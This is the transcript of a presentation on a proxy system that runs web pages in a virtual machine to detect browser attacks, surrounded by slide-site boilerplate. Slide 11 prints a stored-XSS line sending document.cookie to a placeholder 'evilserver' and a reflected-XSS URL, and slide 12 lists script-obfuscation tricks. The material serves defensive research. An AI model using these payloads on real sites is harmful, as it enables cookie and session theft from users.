Presentation is loading. Please wait.

Presentation is loading. Please wait.

Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao."— Presentation transcript:

1 Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao

2 Outline Problem to solve Existing work and background Our solution Task completed and remaining plan.

3 Web security problem In the last few years, the popularity of web- based applications has grown tremendously. One key technology used in interactive web applications is JavaScript. The automatic execution of JavaScript code provided by the remote server may represent a possible vector for attack on the end-user’s computing environment. 3

4 Outline Problem to solve Background and Existing work – Background – Existing work Our solution Task completed and remaining plan.

5 Classification of Attacks Intra-Browser – Changes browser state or steals information Out of Browser – Infects system

6 Intra-Browser Attacks XSS (Cross-Site Scripting) steals information across protection domains Browser extensions which secretly send of parts of viewed pages We don’t aim to prevent these with our solution

7 Attacks on the System through the Browser Exploits: – Javascript engine bugs – Plug-in vulnerabilities (Java, Flash, etc) – Installation of malicious, but signed, plug-ins Goals: – Execution of arbitrary code – “Drive-by-download” installation of malware

8 Trend of web security attack 1 8 Top 10 web application vulnerabilities for 2006 from Source: OWASP(Open Web Application Security Project ) Report Cross-site scripting(XSS) vulnerability occupies the top most position

9 Trend of web security attack 2 9 Increasing trend in web application security vulnerabilities over a period of six years from CVE( Common Weakness Enumeration)

10 XSS attacks In Cross-site Scripting (XSS) attack, an attacker forces a client, typically a web browser, to execute attacker-supplied executable code, typically JavaScript code, which runs in the context of a trusted web site 10/50

11 XSS: Two kinds Two general methods for injecting malicious code into web page that is displayed to the user – stored XSS : the attacker persistently stores the malicious code in a resource managed by the web application. such as a database document.images[0].src = "http://evilserver/image.jpg?stolencookie=" >+ document.cookie; – reflected XSS: the attack script is not persistently stored, but, instead, it is immediately “reflected” back to the user http://www.vulnerable.site/welcome.cgi?name= alert(document.cookie) 11

12 Stored XSS:More difficult to be detected and more harmful for Internet. 12 1. 2. 3.... 4.... 5..bar{background-image:url("javascript:alert(’JavaScript’)");} 6. 7. 8. 9. 10.... 11. ]]> 12. 13. 14. 15. Embeds a script contained in a separate file an event handler background elements will be obtained by executing a script. an element that uses an inline CSS style to invoke a script script in XML script can be broken across multiple CDATA sections URL is the base64 encoding of a javascript:URL URL has been character encoded HTML entity encoding to hide quote characters in a script

13 Why difficult to detect 1. Signatures for application vulnerability are based on the applications which are commonly used. One signature can cover a vulnerability a lot of servers may have. However, each website has its own code, and corresponding vulnerability. 2. Script vulnerabilities are not easy to describe by signature, because it has many subtleties and variants. 3. Sometimes, it is not a vulnerability of the website. The attack may have compromise this website and change the web page by append its own malicious code without web master’s attention. 13/50

14 Current method A comprehensive research on web security, particularly in cross site scripting started around 2001. Categories of solutions are based on the – Location :client side,server side, third part check point – Analysis type: static, dynamic, taint, alias, data flow, source code, control flow graph. – Technique: crawling, reverse engineering, black box testing, proxy server. – Intrusion detection type: anomaly, misuse, automatic, multimodal. 14

15 VMMs for Security Run software within a sandbox Filter system calls made and interactions with the system Full access to the OS’s state VMM VM w/ Guest OS Browser

16 Detecting Attacks with VMMs Memory Inspection (Garfinkel ‘03) – Uses Mission Critical’s crash utility to acquire state (crash normally reads /dev/kmem) – Detection Strategies: Verify binaries have not been modified Scan filesystem for signatures Identify sniffers by checking for raw socket use Query the system within the virtual machine and verify the integrity of the response (does ps lie?) – Feed into policy engine

17 Detecting Attacks with VMMs Injecting Sensors into Kernel (Asrigo ‘06) – Dynamically rewrites kernel code to include sensors – Monitors: Arguments passed to programs Redirecting of streams (hijacking of resources) Modifications of filesystem Sockets listening to unauthorized ports

18 Outline Problem to solve Existing work and background Our solution – Motivation – Our System Task completed and remaining plan.

19 Motivation 19/50 Security Proxy is a security device deployed on Internet to detect the attack. The advance of security proxy is: It can access all the traffic coming in and out the server. If one web is detected as containing malware code, proxy is easy to block this page or site. Proxy can project both sides by filtering the input and output of server.

20 What we want to do 1. Implement a detection system for malicious script code on proxy. 2. Design a script filter to filter out as much as possible benign traffic. 20/50

21 Spyproxy A proxy that sits between the user and the web and: - Loads web pages before the client does to detect attacks TestSafe

22 Our System Proxy VMM Operating System Browser Page Modified Page with Hooks User’s Browser Page w/ Hooks Page w/ Hooks Events to Test 1.We modify the javascript sent to the user to provide the proxy with events to test 2.We filter script files rather than entire web pages

23 Comparison with SpyProxy SpyProxy performs similar functionality – Web proxy that runs pages in virtual machine – Build a whitelist/blacklist for pages Our work improves on this by: – Using feedback from user to trigger exploits – Build a whitelist/blacklist for scripts

24 Script code Filter 24/50 What filter for: 1. when packets first come, construct a whitelist for its script code segment. 2. Next time this script code appears, we can decide whether it will be scanned by virtual machine. Observation for the script code: 1. unique script code segment is far less than the script code segments. Website will reuse script code. 2. script code will not change even the webpage is dynamically changed. Such as the first page of cnn. 3. script code of big size has fewer modification probability

25 Outline Problem to solve Existing work and background Your solution, including the VMM system Task completed and remaining plan.

26 Tasks completed 1.Investigation of Related Topics a)Web-plugin vulnerabilities b)Webpage modification attacks 2.Design of defense systems a)Our web proxy (in previous slide) b)Attack detection and rollbacking with transactional memory c)Get script codes from crawled web pages

27 Time plan Week 7 and 8: Acquire SpyProxy and deploy it Week 9: Analyze the script code for the filter to build a scalable proxy. Week 10: Preparation for the final report and presentation

Download ppt "Detection of Attacks with Proxy-based Execution Alex Kiaie, Benjamin Prosnitz, Yi Tang, Yinzhi Cao."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
PHP I.

PHP I.
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.

Path Cutter: Severing the Self-Propagation Path of XSS JavaScript Worms in Social Web Networks Yinzhi Cao, Vinod Yegneswaran, Phillip Porras, and Yan Chen.
Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.

Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
Cloud Computing Part #3 Zigmunds Buliņš, Mg. sc. ing 1.

Cloud Computing Part #3 Zigmunds Buliņš, Mg. sc. ing 1.
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
Security+ Guide to Network Security Fundamentals, Third Edition

Security+ Guide to Network Security Fundamentals, Third Edition
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Department Of Computer Engineering

Department Of Computer Engineering
Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.

Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

Similar presentations

Ads by Google